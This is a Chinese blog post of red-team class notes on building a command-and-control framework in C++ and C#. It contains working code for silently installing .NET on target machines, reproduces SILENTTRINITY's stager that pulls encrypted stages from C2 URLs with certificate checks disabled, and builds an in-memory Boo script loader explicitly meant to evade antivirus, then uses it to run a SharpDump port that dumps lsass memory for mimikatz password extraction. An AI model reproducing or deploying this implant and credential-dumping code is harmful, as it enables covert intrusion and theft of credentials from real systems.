zoukankan      html  css  js  c++  java
  • C2分析设计(“实践与灼见”课堂笔记)

    ——本文整理依据自作者Moriarty

    C2分析设计一开始气量不宜太高,先以几个开源的框架作为基础,取其精华,组织成一个新的C2出来。其实这个C2的设计并不简单,需要从整个C2的框架开始进行设计,然后是协议等等,挺复杂的。我们先通过大概的去构思一个C2,然后将其中的每一个环节进行分解,把每一个细节将清楚,这样大家的接受程度可能会高一点。

    我们第一个取材的是SILENTTRINITY,需要从中提炼两个好东西,更准确的其实只有一个东西,另外一个东西是它延申出来的,当然我们取材的还有第二个、第三个、第四个、第五个,把这些C2好的东西都给它提炼出来,然后进行组装,那个时候再从协议设计上去细讲,大家接受起来就比较容易了。

    1. 今天先来讲下C端大概的规划,咱们的主要开发语言是C#,C#主要的框架就是.net framework,用来做这些东西方便且效率高,而且加上.net framework在windows操作系统上的普及以及编译后程序集(Assembly)的灵活性,C#+.net成为了最合适的一个搭配。但是他们有一个不太好的地方就是C#语言发展太快了,分了很多版本,从1.0到7.0语法发生着各种变化,对应的.net框架也从1.0开始到现在的4.8,大家在写的时候就会过多的考虑兼容性,会考虑目标机器上.net框架版本,win10可能是默认4.0,2008可能是默认装3.5等等版本的兼容性,这个对于C2设计来讲是一个坎,这个坎不是说有多难,而是说会造成很多开发上的困扰,那么怎么去解决呢?其实换一种设计理念,我不管你目标系统上.net的版本是多少,除非你达到我想要的那个版本,否则的话我就给你装,发现你的版本不是我的开发版本(4.8),就将你的版本升级到我的开发版本(4.8)。这种方式第一个好处就是在写代码的时候不用去考虑兼容性,第二个好处就是更高版本的.net做更多的事情。那怎么去做呢?不可能大摇大摆的在人家的桌面上弹个安装框对吧,或者你去用人家的鼠标瞎点。这里边其实微软都已经帮咱们选好了,拿4.8来说,4.8版本的安装一般都分离线的和在线安装,在线安装版本可能体量比较小,1-3MB。离线的可能就是上百MB了,我们传一个上百MB的安装包是不现实的,所以我们只能使用在线安装。.net在线安装支持很多命令行参数,有些参数可以完全做到静默安装,而且也不用重启,再加上.net framework本来就是微软的东西,所以自带通行证,没有杀软会去管这个事情。那么另外一种安装方式就是采用键盘消息之类的去安装,不过操作比较复杂,可以参考三好学生的文章。到底怎么安装上看个人的情况。

    2. 第二点就是还要考虑一种情况,用.net写是默认承认目标机器的.net符合自己要求,万一安装升级不成功怎么办?那么我们的C端核心(core)就不能用.net去写,咱们的core就要用C或者C++去写,当然汇编也行。由core去判断.net版本,如果不满足就负责安装.net,安装成功之后后续的工作交由.net来做。这就是一个大概C端的设计,今天主要讲讲C端涉及到的技术点。首先第一点你肯定要用C或者C++去写东西,其中有一个非常重要的功能就是通过支持SSL的HTTP协议使用Web Downloader去下载.net framework的在线安装包,下载完成后通过创建进程去执行安装包实现.net framework的安装。这个功能其实也不难,用Google随便搜索http wrapper c++ 这种方式就能搜到很多,看自己喜好了,这块选择上要提醒一下,虽然是C++的东西,但是尽量不要找带有MFC的包装类(wrapper),因为MFC牵扯到了太多乱七八糟的东西。我选择的是HttpInterface(https://github.com/JelinYao/HttpInterface),这个实现挺完美的,今天就以它为例子,看看下载执行这一块儿的东西。

    HttpInterface

    先用visual studio打开项目

    打开之后有两个工程,IHttp是咱们要用到的工程,UserHttp是测试工程,这个可以直接编译,编译出来是一个dll,这个肯定不行,因为是需要集成到core里面的所以需要改为静态库

    将代码生成处的运行库改为MT,然后进行右键项目点击生成进行编译,在编译完成后就会在新生成的目录中出现IHttp.lib文件

    HttpInterface分析

    我们可以来过下类的代码看下它的类是怎么用的

    为实现Http访问,微软提供了二套API:WinINet, WinHTTP。WinHTTP比WinINet更加安全和健壮,可以这么认为WinHTTP是WinINet的升级版本。这两套API包含了很多相似的函数与宏定义,这两个API都是对Socket的封装。

    它封装的HTTP类分别实现了使用WinInet这种方式和WinHttp方式做HTTP访问,还有一个是用纯Socket库去做的,我们使用WinHttp这种方式去访问

    这里我将用到的WinHTTP API方法做访问的流程做了一个注释,方便理解

    在Init方法中使用API的WinHttpOpen方法获得一个会话句柄m_hInternet

    在ConnectHttpServer方法中使用WinHttpConnect获得一个连接会话

    在CreateHttpRequest方法中使用WinHttpOpenRequest建立一个http请求

    不过最简单的方式还是用它自带的测试类,这样比较方便一点。

    在开头有一个回调来输出下载进度,我们需要把这个进度返回给TeamServer端,然后进入主函数

    TestWinHttp方法演示了使用WinHttp封装好的类访问HTTP的方式

    下边有一个TestDownloadFile方法演示了怎么下载文件,这个刚好适合我们,咱们可以直接将这个测试代码拿过来用。

    HttpInterface测试

    下一步就是用来下载咱们的.net framework安装包

    右键添加项目直接添加一个新工程

    将该库和导出的头文件(HttpInterface-masterIHttpIHttpIHttpInterface.h)复制到项目文件夹下

    去官网https://dotnet.microsoft.com/download/dotnet-framework/net48获取4.8Runtime的下载地址,下载后右键复制下载链接

    下面来编写自己的程序

    #include "pch.h"
    #include <iostream>
    #include <string>
    #include "IHttpInterface.h" //包含IHttp导出头文件
    
    #pragma commit(lib,"IHttp.lib") //引入IHttp静态库
    
    using std::wstring;
    //下载文件的回调类,显示下载进度&控制下载
    class CMyCallback
     : public IHttpCallback
    {
    public:
     virtual void OnDownloadCallback(void* pParam, DownloadState state, double nTotalSize, double nLoadSize)
     {
      if (nTotalSize > 0)
      {
       int nPercent = (int)(100 * (nLoadSize / nTotalSize));
       printf("下载进度:%d%%
    ", nPercent);
      }
     }
     virtual bool IsNeedStop()
     {
      //如果需要在外部终止下载,返回true
      return false;//继续下载
     }
    };
    bool TestDownloadFile(const wchar_t* pUrl, const wchar_t* plocalpath)
    {
     IWinHttp* pHttp;
     bool bRet = CreateInstance((IHttpBase**)&pHttp, TypeWinHttp); //返回一个Http类,类型为WinHttp
     if (!bRet)
     {
      return false;
     }
     CMyCallback cb;
     pHttp->SetDownloadCallback(&cb, NULL); //设置下载回调
     //const wchar_t* pUrl = L"https://pm.myapp.com/invc/xfspeed/qqsoftmgr/QQSoftDownloader_v1.1_webnew_22127@.exe";
     //const wchar_t* pSavePath = L"c:\down.exe";
     if (!pHttp->DownloadFile(pUrl, plocalpath)) //使用DownloadFile方法下载文件并保存到相应位置
     {
      //下载失败
      //DWORD dwCode = GetLastError(); //返回操作码
      HttpInterfaceError error = pHttp->GetErrorCode();
      pHttp->FreeInstance();
      return false;
     }
     pHttp->FreeInstance();
     return true;
    }
    int main()
    {
     wstring* purl = new wstring(L"https://download.visualstudio.microsoft.com/download/pr/014120d7-d689-4305-befd-3cb711108212/1f81f3962f75eff5d83a60abd3a3ec7b/ndp48-web.exe"); //下载地址
     wstring* plocalpath = new wstring(L"H:\demo\ndp-48-web.exe");//下载后放到H盘demo目录
     if (TestDownloadFile(purl->c_str(), plocalpath->c_str())) //调用下载类
     {
      std::cout << "下载完成" << std::endl;
     }
    }
    

    如果直接Copy项目后打开出现很多错误,解决方案就是右击项目选择重定向项目,之后再右键项目选择重新扫描解决方案即可解决问题。

    HttpInterface整合

    下载完成后使用CMD打开可查看其可选参数

    我们只需要/q和/norestart参数即可完成静默安装,具体的代码实现如下

    #include <iostream>
    #include <string>
    #include <windows.h>
    #include "IHttpDownloader.h"
    
    using std::wstring;
    #pragma comment(lib,"IHttp.lib")
    
    bool TestDownloadFile(const wchar_t* purl, const wchar_t* plocalpath) {
    	IWinHttp* pHttp;
    	bool bRet = CreateInstance((IHttpBase**)&pHttp, TypeWinHttp);
    	if (!bRet)
    	{
    		return false;
    	}
    	CMyCallback cb;
    	pHttp->SetDownloadCallback(&cb, NULL);
    	//const wchar_t* pUrl = L"https://download.visualstudio.microsoft.com/download/pr/014120d7-d689-4305-befd-3cb711108212/1f81f3962f75eff5d83a60abd3a3ec7b/ndp48-web.exe";
    	//const wchar_t* pSavePath = L"e:\temp\ndp48-web.exe";
    	if (!pHttp->DownloadFile(purl, plocalpath))
    	{
    		DWORD dwCode = GetLastError();
    		HttpInterfaceError error = pHttp->GetErrorCode();
    		pHttp->FreeInstance();
    		return false;
    	}
    	pHttp->FreeInstance();
    	return true;
    }
    bool RunDotnetInstaller(const wchar_t* plocalfile) { //传入指定路径
    	STARTUPINFO si = {0};
    	PROCESS_INFORMATION pi = { 0 };
    	wstring* pfile = new wstring(plocalfile);
    	//wchar_t cmd[] = L"notepad.exe";
    
    	pfile->append(L" /q /norestart");  //运行添加参数
    	si.cb = sizeof(si);
    	si.dwFlags = SW_SHOW;
    	MessageBoxW(NULL, pfile->c_str(), L"message", MB_OK);
    
    	if (!CreateProcessW(NULL,(LPWSTR) pfile->c_str(), NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
    		std::cout << "Starting Installer failed!" << std::endl;
    		delete pfile;
    		return false;
    	}
    	std::cout << "Start installing successfully! Process ID is " << pi.dwProcessId << std::endl;
    	DWORD status = WaitForSingleObject(pi.hProcess, INFINITE); //等待安装结束
    	if (status == WAIT_OBJECT_0) {
    		std::cout << "Installation Complete!" << std::endl;
    	}
    	delete pfile;
    	return true;
    }
    int main()
    {
    	if (TestDownloadFile(L"https://download.visualstudio.microsoft.com/download/pr/014120d7-d689-4305-befd-3cb711108212/1f81f3962f75eff5d83a60abd3a3ec7b/ndp48-web.exe", L"h:\demo\ndp48-web.exe")) {//传入下载地址和保存地址
    		std::cout << "downloading complete!" << std::endl;
    		if (RunDotnetInstaller(L"d:\tmp\ndp48-web.exe"))//静默安装
    			std::cout << "We are all set!" <<std::endl;
    	}
    	return true;
    }
    

    这个项目的功能很简单,就是从微软官方下载安装包,再在目标机器上进行静默安装,这样安装成功后目标系统就有了我们想要的4.8的环境,有了环境后咱们的那些功能就能正常使用了。还有一种方法就是直接将安装包通过TeamServer传给C端的Core直接进行安装这也是没问题的。

    BooLang

    (图-1)

    下面来讲第二个点,也是我想说的重点,就是从SILENTTRINITY上面去挖掘的一个点,它使用了一个第三方开发的动态语言Boolang,这个语言从创建时间来看应该是很早了,而且现在已经停止更新了,但是它有完整的源码,在我研究过之后发现很好用,先前在设计我们自己的C2的时候当时选择的插件语言是IronPython,插件第一个主要的任务是就是在本地进行功能扩展,另外类似Cobalt Strike是通过进行本地去写,实际上是在本地进行解析执行,然后实际要干的功能还是要通过网络传输传输到C端由C端去实际执行,而C端实际执行的就是那些真正的公用代码,比如说.net的Assembly之类。那么咱们的设计要比Cobalt Strike稍微增加一个功能,就是脚本不光可以用在本地,同样也支持将脚本传到目标系统内进行解析执行。当然这样要保证第一点就是在目标系统内执行得需要解释器,这个动态解释器肯定不能落地,这个Boolang其实最大的好处就是解析执行Boolang脚本只需要几个Assembly并且体积并不大,因为这个东西是基于.net去写的,所以只需要将解释器的dll(图-1)想办法传到C端上去,然后由C端进行直接通过Assembly.load这个方法把这些dll直接加载到内存里,然后加载成功之后再传过来的Boolang的脚本就可以被解析执行了。这个其实就是SILENTTRINITY最大的亮点。

    SILENTTRINITY

    咱们的设计也是基于Boolang这种形式,通过阅读它的Naga源码挑出几个关键的点来进行模拟,首先大概看一下它的功能代码,主代码位于NagaProgram.cs

    using System;
    using Naga;
    using Naga.Properties;
    
    namespace NagaExe
    {
        class Program
        {
            static void Main(string[] args)
            {
                string[] _urls;
                string _guid;
                string _psk;
    
                //检索输入的指定字符串资源
                _guid = Resources.ResourceManager.GetString("GUID").ToString(); 
                _psk = Resources.ResourceManager.GetString("PSK").ToString();
                _urls = Resources.ResourceManager.GetString("URLs").ToString().Split('|')[0].Split(',');
    
    #if DEBUG
                Console.WriteLine("[*] Found info in embedded resources:");
                Console.WriteLine("	- GUID: {0}", _guid);
                Console.WriteLine("	- PSK: {0}", _psk);
                Console.WriteLine("	- URLS: {0}", String.Join(",", _urls));
    #endif
    
                if (args.Length < 3)
                {
                    if (_guid == "00000000-0000-0000-0000-000000000000" && _psk == new String('@', 64))
                    {
                        Console.WriteLine("Usage: ST.exe <GUID> <PSK> <URL1,URL2...>");
                        Environment.Exit(1);
                    }
                }
                else
                {
                    try
                    {
                        _guid = args[0];
                        _psk = args[1];
                        _urls = args[2].Split(',');
    
                        Guid.Parse(_guid);
                        foreach (var url in _urls)
                        {
                            new Uri(url);
                        }
                    }
                    catch
                    {
                        Console.WriteLine("Not enough arguments or invalid parameters");
                        Environment.Exit(1);
                    }
                }
    
                ST.Start(_guid, _psk, _urls);//调用ST类Start方法对传入资源做处理
            }
        }
    }
    

    前面都是取各种参数,我们重点关注ST类

    using System;
    using System.IO;
    using System.IO.Compression;
    using System.Reflection;
    using System.Net;
    using System.Text;
    using System.Runtime.InteropServices;
    using Boo.Lang.Compiler;
    using Boo.Lang.Compiler.IO;
    using Boo.Lang.Compiler.Pipelines;
    
    namespace Naga
    {
        public class ST
        {
            private static Guid GUID;
            private static string[] URLS; 
            private static string HEXPSK;
            private static byte[] PSK;
            private static ZipStorer _stage;
    
            //构造函数初始化ServicePointManager对象进行Internet访问
            static ST()                                                                                                     
            {
                ServicePointManager.ServerCertificateValidationCallback += (sender, cert, chain, sslPolicyErrors) => true; //获取或设置用于验证服务器证书的回调
                ServicePointManager.SecurityProtocol = (SecurityProtocolType)768 | (SecurityProtocolType)3072; //指定连接使用TLS1.1或TLS1.2协议
                ServicePointManager.Expect100Continue = false; //直接发送数据不使用100-Continue
                AppDomain.CurrentDomain.AssemblyResolve += ResolveEventHandler; //解析失败时触发,调用ResolveEventHandler返回非运行目录指定dll的Assembly对象
            }
    
            //加载指定dll,返回对应dll的Assembly对象
            private static Assembly ResolveEventHandler(object sender, ResolveEventArgs args)
            {
                var dllName = Utils.GetDllName(args.Name); //分割参数返回dll名
    #if DEBUG
                Console.WriteLine("	[-] '{0}' was required...", dllName);
    #endif
                byte[] bytes;
                try
                {
                    bytes = Utils.GetResourceByName(dllName);
                }
                catch
                {
                    bytes = Utils.GetResourceFromZip(_stage, dllName) ??
                            File.ReadAllBytes(RuntimeEnvironment.GetRuntimeDirectory() +
                                              dllName);
                }
    #if DEBUG
                Console.WriteLine("	[+] '{0}' loaded...", dllName);
    #endif
                return Assembly.Load(bytes);
            }
    
            public static void Start(string _guid, string _psk, string[] _urls)
            {
                //AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(ResolveEventHandler);
    
                GUID = Guid.Parse(_guid);
                HEXPSK = _psk;
                PSK = Utils.Hex2Binary(_psk);
                URLS = _urls;
    
    #if DEBUG
                Console.WriteLine("[+] URLS: {0}", String.Join(",", URLS));
    #endif
                while (true)
                {
                    foreach (var url in URLS)
                    {
                        Uri URL;
                        URL = new Uri(new Uri(url), GUID.ToString());
                        try
                        {
                            byte[] key = Crypto.ECDHKeyExchange(URL, PSK);
                            byte[] encrypted_zip = Comms.HttpGet(URL);
                            _stage = ZipStorer.Open(new MemoryStream(Crypto.Decrypt(key, encrypted_zip)), FileAccess.ReadWrite, true);
    
                            byte[] resource = Utils.GetResourceFromZip(_stage, "Main.boo");
                            string source = Encoding.UTF8.GetString(resource, 0, resource.Length);
    
                            RunBooEngine(source);
                        }
                        catch { }
                    }
                }
            }
    
            public static void RunBooEngine(string source)
            {
                Console.WriteLine("
    [*] Compiling Stage Code");
    
                CompilerParameters parameters = new CompilerParameters(false);
                parameters.Input.Add(new StringInput("Stage.boo", source));
                parameters.Pipeline = new CompileToMemory();
                parameters.Ducky = true;
    
                parameters.AddAssembly(Assembly.LoadWithPartialName("Boo.Lang"));
                parameters.AddAssembly(Assembly.LoadWithPartialName("Boo.Lang.Extensions"));
                parameters.AddAssembly(Assembly.LoadWithPartialName("Boo.Lang.Parser"));
                parameters.AddAssembly(Assembly.LoadWithPartialName("Boo.Lang.Compiler"));
                parameters.AddAssembly(Assembly.LoadWithPartialName("mscorlib"));
                parameters.AddAssembly(Assembly.LoadWithPartialName("System"));
                parameters.AddAssembly(Assembly.LoadWithPartialName("System.Core"));
                parameters.AddAssembly(Assembly.LoadWithPartialName("System.Web.Extensions"));
                //Console.WriteLine(compiler.Parameters.LibPaths);
                //compiler.Parameters.LoadAssembly("System");
    
                BooCompiler compiler = new BooCompiler(parameters);
                CompilerContext context = compiler.Run();
    
                //Note that the following code might throw an error if the Boo script had bugs.
                //Poke context.Errors to make sure.
                if (context.GeneratedAssembly != null)
                {
                    Console.WriteLine("[+] Compilation Successful!");
                    Console.WriteLine("[*] Executing");
    
                    //AppDomain.CurrentDomain.AssemblyResolve -= ResolveEventHandler;
                    //反射调用并传入参数到boo脚本
                    context.GeneratedAssembly.EntryPoint.Invoke(null, new object[] { new string[] { GUID.ToString(), HEXPSK, string.Join(",", URLS) } });
                }
                else
                {
                    Console.WriteLine("[-] Error(s) compiling script, this probably means your Boo script has bugs
    ");
                    foreach (CompilerError error in context.Errors)
                        Console.WriteLine(error);
                }
            }
        }
    }
    

    在ST类的ResolveEventHandler方法中会加载传入的dll,第二点就是怎么把dll带进去,它是作为一个stager的过程将那四个dll打包成zip文件传过去。在实际的红队渗透中不涉及C2的话咱们可以完全把这个功能单独提取出来用,好处就是在免杀效果上有非常不错的表现。咱们先把它单独提取出来演示一下,后面再来慢慢组装C2

    使用C#内存加载运行Boolang

    新建一个名为BooTest的C#项目

    然后将ZIP包的DLL资源嵌入到项目中,DLL资源从https://github.com/boo-lang/boo获取

    除SILENTTRINITY使用的四个DLL外,其实还有一个扩展方法,需要用到另外一个DLL,咱们就一起打包了

    打包后右键添加文件夹改名为Resources

    右键文件夹添加现有项

    选择所有文件并引入打包好的Boo.zip

    将生成操作改为嵌入的资源,点击保存后成功的将资源嵌入。

    再添加zip操作类,代码位于https://github.com/jaime-olivares/zipstorer/blob/master/src/ZipStorer.cs

    右键项目>添加>新建项,新建ZipStorer类然后将代码Copy过来,关于Boolang的语法在GitHub的wiki上有写,有兴趣的可以去看看。

    然后将ST类的的ResolveEventHandler函数和RunBooEngine函数Copy过来,和它用到的方法一起Copy过来,最后将其进行整理。

    using Boo.Lang.Compiler;
    using Boo.Lang.Compiler.IO;
    using Boo.Lang.Compiler.Pipelines;
    using System;
    using System.Collections.Generic;
    using System.IO;
    using System.IO.Compression;
    using System.Linq;
    using System.Reflection;
    using System.Runtime.InteropServices;
    using System.Text;
    using System.Threading.Tasks;
    
    namespace BooTest
    {
        class Program
        {
            private static ZipStorer _boozip = ZipStorer.Open(new MemoryStream(GetResourceAsbytes("Boo.zip")), FileAccess.ReadWrite, true);
    
            public static string GetDllName(string name)
            {
                var dllName = name + ".dll";
                if (name.IndexOf(',') > 0)
                {
                    dllName = name.Substring(0, name.IndexOf(',')) + ".dll";
                }
    
                return dllName;
            }
    
            public static string GetResourceFullName(string resName) => Assembly.GetExecutingAssembly().GetManifestResourceNames().FirstOrDefault(x => x.EndsWith(resName));
    
            internal static byte[] GetResourceAsbytes(string resName)
            {
                using (var resourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(GetResourceFullName(resName)))
                {
                    using (var memoryStream = new MemoryStream())
                    {
                        resourceStream?.CopyTo(memoryStream);
                        return memoryStream.ToArray();
                    }
                }
            }
    
            //获取boo脚本源码
            public static string GetResourceAsString(string resName)
            {
                string _content = null;
                using (Stream _stream = Assembly.GetExecutingAssembly().GetManifestResourceStream(GetResourceFullName(resName)))
                {
                    using (StreamReader _txtreader = new StreamReader(_stream))
                    {
                        _content = _txtreader.ReadToEnd();
                    }
                }
                return _content;
    
            }
            public static byte[] GetResourceFromZip(ZipStorer zip, string name)
            {
                foreach (var entry in zip.ReadCentralDir())
                {
                    if (entry.FilenameInZip != name) continue;
                    zip.ExtractFile(entry, out var data);
                    return data;
                }
    
                return default;
            }
    
            private static Assembly ResolveEventHandler(object sender, ResolveEventArgs args)
            {
                var dllName = GetDllName(args.Name); //分割参数返回dll名
                Console.WriteLine($"Loading missing dll :{dllName}"); //查看每次加载的dll
                byte[] bytes;
                bytes = GetResourceFromZip(_boozip, dllName) ??
                        File.ReadAllBytes(RuntimeEnvironment.GetRuntimeDirectory() +
                                            dllName);
                return Assembly.Load(bytes);
            }
    
            //解析执行Boo脚本
            public static void RunBooEngine(string name,string source)
            {
                Console.WriteLine("
    [*] Compiling Stage Code");
    
                CompilerParameters parameters = new CompilerParameters(false);
                parameters.Input.Add(new StringInput(name, source));
                parameters.Pipeline = new CompileToMemory();
                parameters.Ducky = true;
    
                parameters.AddAssembly(Assembly.LoadWithPartialName("Boo.Lang"));
                parameters.AddAssembly(Assembly.LoadWithPartialName("Boo.Lang.Extensions"));
                parameters.AddAssembly(Assembly.LoadWithPartialName("Boo.Lang.Parser"));
                parameters.AddAssembly(Assembly.LoadWithPartialName("Boo.Lang.Compiler"));
                parameters.AddAssembly(Assembly.LoadWithPartialName("mscorlib"));
                parameters.AddAssembly(Assembly.LoadWithPartialName("System"));
                parameters.AddAssembly(Assembly.LoadWithPartialName("System.Core"));
                parameters.AddAssembly(Assembly.LoadWithPartialName("System.Web.Extensions"));
                //Console.WriteLine(compiler.Parameters.LibPaths);
                //compiler.Parameters.LoadAssembly("System");
    
                BooCompiler compiler = new BooCompiler(parameters);
                CompilerContext context = compiler.Run();
    
                //Note that the following code might throw an error if the Boo script had bugs.
                //Poke context.Errors to make sure.
                if (context.GeneratedAssembly != null)
                {
                    Console.WriteLine("[+] Compilation Successful!");
                    Console.WriteLine("[*] Executing");
    
                    //AppDomain.CurrentDomain.AssemblyResolve -= ResolveEventHandler;
                    context.GeneratedAssembly.EntryPoint.Invoke(null, new object[] { null });
                }
                else
                {
                    Console.WriteLine("[-] Error(s) compiling script, this probably means your Boo script has bugs
    ");
                    foreach (CompilerError error in context.Errors)
                        Console.WriteLine(error);
                }
            }
            static void Main(string[] args)
            {
            }
        }
    }
    

    RunBooEngine是用来解析执行boo脚本的,但是他在执行的时候需要引用boo的一些库函数,我们将boo的几个类型引入进来

    引用右键添加引用

    在浏览处添加刚刚那几个dll,点击确定

    添加库,其它异常同理。

    然后右键添加boo脚本进行演示,将文件的属性也改为嵌入式资源。Boolang的语法是取了Python和ruby等的语言精华然后融合成的新语法,所以说主要还是像python,剩下的20%和10%分别是ruby和.net。

    test.boo

    import System
    
    print "Hello From inside Boo"
    

    在项目的main函数中执行我们的boo脚本

            static void Main(string[] args)
            {
                //解析失败时触发,调用ResolveEventHandler返回指定dll的Assembly对象
                AppDomain.CurrentDomain.AssemblyResolve += ResolveEventHandler;
                //尝试执行test.boo
                RunBooEngine("test.boo", GetResourceAsString("test.boo"));
                Console.ReadKey();
    
            }
    

    右键编译项目查看运行结果

    可以看到boo脚本已经成功的解析执行了,在dll的加载中我们可以看到它调用了ResolveEventHandler首先加载了zip包中的dll,然后通过File.ReadAllBytes(RuntimeEnvironment.GetRuntimeDirectory() + dllName);获取系统dll目录从系统目录里加载dll

    C#内存加载Boolang进行进程Dump

    到这一步之后咱们怎么做到实际的免杀?其实这时候杀软从booTest.exe中就很难找到被查杀的特征了,加载boolang的过程是看不出威胁性的,有威胁性的代码都在test.boo中加载到了内存直接解析执行,这就是用Boolang的好处,下面我们找一个功能试一下。https://github.com/GhostPack/SharpDump/blob/master/SharpDump/Program.cs 这个项目功能就是使用MiniDumpWriteDump函数来做lsass进程的内存Dump,用Boolang更大的好处在于可以调试,它有Visual Studio插件还有IDE环境,比较好用的就是SharpDevelop 4.4,在安装的时候需要选择安装Boo语言

    在新建解决方案中可以看到支持Boo的项目,在4.4中有一个功能就是可以直接将C#源码转换为Boo语言,我们新建一个C#文件,选择Empty File并将SharpDump源码粘贴进来

    在Tools的Convert code to 选项处可以选择转换为Boo语言

    在转换完成之后需要修复可能出现的Bug,比如这里就提示了在51行和37行不支持可选参数

    经过分析后发现Minidump在cs源码中有一个默认参数-1

    Boo

    当未加上进程PID参数时会直接调用Minidump,实际上传递了默认参数-1。Minidump方法中进行了判断,当pid为默认的-1时会直接返回lsass相关联的进程资源数组,由于Boolang不支持默认参数,所以我们需要改一下传入一个-1即可。

    其次在Boolang中duck为动态类型,所以关于动态类型赋值的地方需要修改为duck

    在读注册表操作处将var类型改为duck

    读文件操作处也可以用duck,但是因为明确返回为byte类型,所以也可以用byte,将var改为byte。

    这时将文件保存到boo-masterin目录下使用booc.exe进行编译

    使用-h参数可以查看其用法

    我们直接跟上boo脚本进行编译

    编译后发现爆出了一个警告没有Main方法,查看代码发现Main函数因为C#的写法在转换后被包进了Program类中,而在Boo语法中类就是类,入口函数是单独的,所以我们需要将Main函数回退一格缩进

    选中Main函数后按住Shift+Tab直接会回退一格缩进

    再将调用的静态方法Minidump加上类名,保存后进行编译

    这时可以看到已经编译成功,同时编译出了一个dll,我们使用高权限运行CMD后运行SharpDump.exe看看是否有问题

    可以看到已经成功导出了lsass.exe的Dump,改名解压后即可使用mimikatz查看口令。

    没有问题之后咱们就可以将boo脚本放入我们的工程里面了

    新建文件SharpDump.boo,选择生成操作为嵌入式资源

    直接将转换后的代码Copy过来即可

    修改执行的Boo脚本,右键项目重新编译成exe文件。

    运行后发现出现了NullReferenceException错误,在反射调用的地方发现传入了null

    而在sharpdump.boo的main函数实现中必须得传入一个字符串数组

    所以我们传入一个空字符串数组,或者传入-1即可

    保存编译后发现成功执行了boo脚本但是dump失败,最后发现是版本问题,将编译版本改为4.5即可

    很奇怪的是改为4.5之后再改为4.8又能成功dump了。

    结尾

    今天这一将基本上就算把借鉴SILENTTRINITY的东西讲完了,咱们的C2代码执行这一块儿就基于Boolang来做,这个模块就是核心的执行模块。然后下一步就是从其它的开源C2里面借鉴一些设计比较好的功能,比如说协议、数据包设计等等。第一期的主要任务就是把目前市面上能看到的开源C2的优点都提取出来跟咱们整体的C2设计结合。

    个人总结

    这次对我来说是个很大的挑战,我对C2设计这方面一窍不通,C#也不懂。但是胜在其他语言和Web安全方面有一定的基础,最终还是一步一步跟着老师复现环境然后把这篇文章努力写完了,也学到了很多。

  • 相关阅读:
    4.终端
    **如何让CI框架支持service层
    *CI框架装载器Loader.php源码分析
    如何在CI中写工具类,在哪个目录写
    ***在PHP语言中使用JSON和将json还原成数组(json_decode()的常见错误)
    DedeCMS常见问题和技巧
    ***Linux系统下如何查看及修改文件读写权限
    ***linux下安装xampp,XAMPP目录结构(阿里云安装xampp)
    PHP5.2至5.6的新增功能详解
    PHP 5.2、5.3、5.4、5.5、5.6 对比以及功能详解
  • 原文地址:https://www.cnblogs.com/AirSky/p/Redteam_DesignC2.html
Copyright © 2011-2022 走看看